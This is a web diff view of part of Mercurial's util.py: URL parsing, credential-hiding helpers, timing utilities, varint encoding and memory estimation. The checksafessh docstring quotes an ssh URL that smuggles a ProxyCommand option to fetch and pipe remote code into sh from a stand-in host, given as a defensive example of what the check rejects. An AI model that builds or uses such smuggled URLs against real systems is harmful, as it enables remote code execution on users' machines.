    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in the user and password components
    _safechars = b"!~*'()+"
    # characters left unquoted in the path and fragment components
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # type: (bytes, bool, bool) -> None
        """Parse ``path`` into its URL components.

        parsequery and parsefragment control whether the query and the
        fragment are split off or left in place (see the class docstring).
        Raises error.Abort for a file:// URL whose host is not one of
        localhost, 127.0.0.1 or [::1].
        """
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def copy(self):
        """Return a new url object carrying the same components as this one."""
        # The constructor argument is a placeholder; every parsed attribute
        # is overwritten below.
        u = url(b'temporary useless value')
        u.path = self.path
        u.scheme = self.scheme
        u.user = self.user
        u.passwd = self.passwd
        u.host = self.host
        # port has to be copied explicitly, otherwise the copy keeps the
        # placeholder's port (None) and loses the original one
        u.port = self.port
        u.query = self.query
        u.fragment = self.fragment
        u._localpath = self._localpath
        u._hostport = self._hostport
        u._origpath = self._origpath
        return u

    @encoding.strmethod
    def __repr__(self):
        # list only the components that are set, in URL order
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths and bundle: URLs are emitted without any quoting
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            # a bracketed host (IPv6 literal) is emitted unquoted
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authinfo)`` with credentials split off.

        ``url`` is this URL rendered without user and password. ``authinfo``
        is None when no user is set, otherwise the tuple
        ``(None, (url, host), user, passwd or b'')``.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily blank the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        """Tell whether this URL is absolute.

        True for any scheme other than file, and for paths that carry a
        drive letter, a Windows UNC prefix or a leading slash.
        """
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        # type: () -> bytes
        """Return the filesystem path this URL refers to.

        For file and bundle URLs the path is rebuilt from the parsed
        components; for anything else the original, unparsed string is
        returned.
        """
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )
3310
3312
3311
3313
def hasscheme(path):
    # type: (bytes) -> bool
    """Tell whether parsing ``path`` as a url yields a non-empty scheme."""
    parsed = url(path)
    # explicit bool() so pytype sees the declared return type
    return bool(parsed.scheme)
3315
3317
3316
3318
def hasdriveletter(path):
    # type: (bytes) -> bool
    """Tell whether ``path`` begins with a drive letter such as ``c:``.

    Empty (or otherwise false) input yields False.
    """
    if not path:
        return False
    # slices rather than indexing, so one-byte inputs do not raise
    return path[0:1].isalpha() and path[1:2] == b':'
3320
3322
3321
3323
def urllocalpath(path):
    # type: (bytes) -> bytes
    """Return the local path for ``path`` parsed as a url.

    Query and fragment parsing are both disabled, so '?' and '#' stay part
    of the path.
    """
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3325
3327
3326
3328
def checksafessh(path):
    # type: (bytes) -> None
    """Reject ssh urls that could smuggle an option to ssh (SEC).

    ssh parses the first item of the url as an option when it starts with
    a dash, e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. Such
    potentially exploited urls are refused outright so the user is warned.

    The url is unquoted before the check. Raises error.Abort when it is
    unsafe; otherwise returns None.
    """
    decoded = urlreq.unquote(path)
    if decoded.startswith((b'ssh://-', b'svn+ssh://-')):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(decoded),)
        )
3343
3345
3344
3346
def hidepassword(u):
    # type: (bytes) -> bytes
    """Return url string ``u`` with any password replaced by ``***``."""
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = b'***'
    return bytes(parsed)
3352
3354
3353
3355
def removeauth(u):
    # type: (bytes) -> bytes
    """Return url string ``u`` with user and password stripped."""
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
3360
3362
3361
3363
# Formatter for durations, built by unitcountfn from the rows below. Each
# row pairs two numeric factors with a translatable format string for
# seconds, milliseconds, microseconds or nanoseconds.
# NOTE(review): rows look like (multiplier, divisor, format) - confirm
# against unitcountfn.
timecount = unitcountfn(
    (1, 1e3, _(b'%.0f s')),
    (100, 1, _(b'%.1f s')),
    (10, 1, _(b'%.2f s')),
    (1, 1, _(b'%.3f s')),
    (100, 1e-3, _(b'%.1f ms')),
    (10, 1e-3, _(b'%.2f ms')),
    (1, 1e-3, _(b'%.3f ms')),
    (100, 1e-6, _(b'%.1f us')),
    (10, 1e-6, _(b'%.2f us')),
    (1, 1e-6, _(b'%.3f us')),
    (100, 1e-9, _(b'%.1f ns')),
    (10, 1e-9, _(b'%.2f ns')),
    (1, 1e-9, _(b'%.3f ns')),
)
3377
3379
3378
3380
@attr.s
class timedcmstats(object):
    """Timing record handed out by the timedcm context manager on entry."""

    # timer reading taken when the instance is created, as a float (its
    # meaning and resolution are platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # duration in seconds as a floating point value; stays 0 until the
    # context is exited, at which point it is filled in
    elapsed = attr.ib(default=0)
    # nesting depth among timedcm context managers
    level = attr.ib(default=1)

    def __bytes__(self):
        # an elapsed value of 0 means no duration was recorded
        if not self.elapsed:
            return b'<unknown>'
        return timecount(self.elapsed)

    __str__ = encoding.strmethod(__bytes__)
3396
3398
3397
3399
@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """Context manager that times the enclosed block.

    Entering yields a timedcmstats instance; its ``elapsed`` field is
    filled in when the block exits, whether normally or through an
    exception. ``whencefmt`` and ``whenceargs`` are handed to tracing.log
    for the duration of the block.

    This context manager is reentrant: the nesting depth is tracked and
    stored in the ``level`` field of each stats object.
    """
    # one level deeper for the lifetime of this context
    depth = timedcm._nested + 1
    timedcm._nested = depth
    stats = timedcmstats(level=depth)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield stats
    finally:
        stats.elapsed = timer() - stats.start
        timedcm._nested -= 1


# number of timedcm contexts currently active
timedcm._nested = 0
3419
3421
3420
3422
def timed(func):
    """Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass

    The returned wrapper forwards all arguments to ``func`` and returns its
    result. After a successful call it writes one line to procutil.stderr,
    indented according to the nesting level of the timing context. The
    wrapper keeps the name and docstring of ``func``.
    """
    # imported locally: this module does not otherwise depend on functools
    import functools

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write(
            b'%s%s: %s\n'
            % (
                b' ' * time_stats.level * 2,
                pycompat.bytestr(func.__name__),
                time_stats,
            )
        )
        return result

    return wrapper
3447
3449
3448
3450
# Size suffixes and their byte multipliers, tried in this order by
# sizetoint(); the bare b'b' suffix comes last so the two-letter units
# ending in 'b' are matched first.
_sizeunits = (
    (b'm', 1 << 20),
    (b'k', 1 << 10),
    (b'g', 1 << 30),
    (b'kb', 1 << 10),
    (b'mb', 1 << 20),
    (b'gb', 1 << 30),
    (b'b', 1),
)


def sizetoint(s):
    # type: (bytes) -> int
    """Convert a space specifier to a byte count.

    Surrounding whitespace and letter case are ignored. A specifier with
    no recognised unit suffix is read as a plain integer. Raises
    error.ParseError when the numeric part cannot be parsed.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    """
    spec = s.strip().lower()
    try:
        for suffix, factor in _sizeunits:
            if not spec.endswith(suffix):
                continue
            number = spec[: -len(suffix)]
            return int(float(number) * factor)
        return int(spec)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479
3481
3480
3482
class hooks(object):
    """Registry of callables used to extend a function's behavior.

    Every hook is registered together with the name of its source. Calling
    the registry runs the hooks ordered by that source name and collects
    their return values.
    """

    def __init__(self):
        # list of (source, hook) pairs, in registration order until called
        self._hooks = []

    def add(self, source, hook):
        """Register ``hook`` under the source name ``source``."""
        self._hooks.append((source, hook))

    def __call__(self, *args):
        """Call every hook with ``args`` and return the list of results."""
        # Sorts the stored list in place; the sort is stable, so hooks that
        # share a source name keep their registration order.
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3498
3500
3499
3501
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    """Yield the lines of a nicely formatted stacktrace.

    The 'skip' most recent entries are dropped, then only the last 'depth'
    of the remaining entries are kept (a depth of 0 keeps all of them).
    Each file name + line number pair is formatted with ``fileline``.
    Each yielded line is formatted with ``line``.
    If ``line`` is None, tuples are yielded instead:
      length of the longest formatted file name + line number,
      formatted file name + line number,
      function name

    Not to be used in production code, but very convenient while developing.
    """
    # extract_stack() has to be called from this very frame: the trailing
    # "- 1" removes the entry describing getstackframes itself.
    frames = traceback.extract_stack()[: -skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        location = fileline % (pycompat.sysbytes(fn), ln)
        entries.append((location, pycompat.sysbytes(func)))
    # with depth == 0 this is entries[-0:], i.e. every entry
    entries = entries[-depth:]
    if not entries:
        return
    # width of the widest location, so that "%-*s" lines up the columns
    fnmax = max(len(fnln) for fnln, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3523
3525
3524
3526
def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    """Write a message followed by a nicely formatted stacktrace to f.

    msg:    text of the header line; trailing whitespace is stripped
    skip:   number of entries closest to the call that are left out
    f:      stream receiving the output (stderr by default)
    otherf: stream flushed before anything is written (stdout by
            default); pass a false value to skip the flush
    depth:  number of entries shown, 0 meaning all of them
    prefix: bytes prepended to every line that is written

    It can be used everywhere and intentionally does not require a ui object.
    Not to be used in production code, but very convenient while developing.
    """
    if otherf:
        # flush the other stream first so its pending output is not
        # emitted after the trace
        otherf.flush()
    header = b'%s%s at:\n' % (prefix, msg.rstrip())
    f.write(header)
    # "skip + 1" additionally hides the entry for debugstacktrace itself.
    # Keep this a plain loop in this frame: getstackframes() is a generator
    # and inspects the stack when it is first advanced.
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(prefix + frameline)
    f.flush()


# short alias that is quicker to type while debugging
dst = debugstacktrace
3549
3551
3550
3552
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f:      filename to rename (bytes)
    tag:    a bytes tag that will be included in the new name
    ctx:    a context, in which the new name must not exist; only
            membership tests (``name in ctx``) are performed on it
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        # n is an int: bytes %-formatting on Python 3 only accepts
        # bytes-like objects for %s, so the counter must use %d
        fn = b'%s~%s~%d' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
3573
3575
3574
3576
def readexactly(stream, n):
    """Return the result of ``stream.read(n)``, insisting on n bytes.

    Raises error.Abort when the read returns fewer than n bytes.
    """
    data = stream.read(n)
    got = len(data)
    if got >= n:
        return data
    raise error.Abort(
        _(b"stream ended unexpectedly (got %d bytes, expected %d)")
        % (got, n)
    )
3584
3586
3585
3587
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    Raises error.ProgrammingError for a negative value.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    chunks = []
    while True:
        low7 = value & 0x7F
        value >>= 7
        if not value:
            # final group: continuation bit stays clear
            chunks.append(pycompat.bytechr(low7))
            return b''.join(chunks)
        # more groups follow: set the continuation bit
        chunks.append(pycompat.bytechr(0x80 | low7))
3621
3623
3622
3624
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method. Bytes
    are consumed one at a time, up to and including the first byte whose
    most significant bit is clear.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    shift = 0
    more = True
    while more:
        octet = ord(readexactly(fh, 1))
        # the low 7 bits are payload, least significant group first
        value |= (octet & 0x7F) << shift
        shift += 7
        # a set high bit announces another byte
        more = bool(octet & 0x80)
    return value
3655
3657
3656
3658
3657 # Passing the '' locale means that the locale should be set according to the
3659 # Passing the '' locale means that the locale should be set according to the
3658 # user settings (environment variables).
3660 # user settings (environment variables).
3659 # Python sometimes avoids setting the global locale settings. When interfacing
3661 # Python sometimes avoids setting the global locale settings. When interfacing
3660 # with C code (e.g. the curses module or the Subversion bindings), the global
3662 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 # locale settings must be initialized correctly. Python 2 does not initialize
3663 # locale settings must be initialized correctly. Python 2 does not initialize
3662 # the global locale settings on interpreter startup. Python 3 sometimes
3664 # the global locale settings on interpreter startup. Python 3 sometimes
3663 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3665 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 # explicitly initialize it to get consistent behavior if it's not already
3666 # explicitly initialize it to get consistent behavior if it's not already
3665 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3667 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3668 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 # if we can remove this code.
3669 # if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    """Context manager that initializes LC_CTYPE from the user settings.

    When the current LC_CTYPE locale is 'C', it is set from the environment
    for the duration of the ``with`` body and set back afterwards. A locale
    error while doing so is ignored. Any other current locale is left
    untouched.
    """
    previous = locale.setlocale(locale.LC_CTYPE, None)
    if previous != 'C':
        # already initialized to something specific: nothing to do
        yield
        return
    try:
        try:
            locale.setlocale(locale.LC_CTYPE, '')
        except locale.Error:
            # The likely case is that the locale from the environment
            # variables is unknown.
            pass
        yield
    finally:
        locale.setlocale(locale.LC_CTYPE, previous)
3684
3686
3685
3687
def _estimatememory():
    # type: () -> Optional[int]
    """Provide an estimate for the system memory in Bytes.

    On Windows this is the currently available physical memory as reported
    by GlobalMemoryStatusEx. Elsewhere it is the page size multiplied by the
    number of physical pages, both obtained through sysconf.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        # Everything is imported from ctypes itself: ctypes.wintypes does not
        # re-export Structure/byref/sizeof/windll on Python 3. DWORD is an
        # unsigned 32-bit value, hence c_ulong.
        from ctypes import (  # pytype: disable=import-error
            Structure,
            byref,
            c_ulong as DWORD,
            c_ulonglong as DWORDLONG,
            sizeof,
            windll,
        )

        class MEMORYSTATUSEX(Structure):
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        # the API requires the caller to fill in the structure size
        x.dwLength = sizeof(x)
        if not windll.kernel32.GlobalMemoryStatusEx(byref(x)):
            # the call failed, so the structure holds no usable figures
            return None
        return x.ullAvailPhys

    # On newer Unix-like systems and Mac OSX, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
    return None
General Comments 0
You need to be logged in to leave comments. Login now